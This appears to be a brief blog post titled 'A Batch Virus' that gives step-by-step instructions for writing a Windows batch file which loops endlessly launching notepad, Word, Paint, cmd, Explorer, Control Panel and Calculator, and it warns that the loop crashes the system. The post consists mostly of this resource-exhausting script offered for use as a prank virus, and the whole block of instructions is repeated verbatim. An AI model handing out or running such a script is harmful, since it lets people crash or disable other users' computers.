A Batch Virus...
1. open a notepad.
2. write:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
3. save as anyname.bat.
Run the Batch file...
N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.
2. write:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
3. save as anyname.bat.
Run the Batch file...
N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.
No comments:
Post a Comment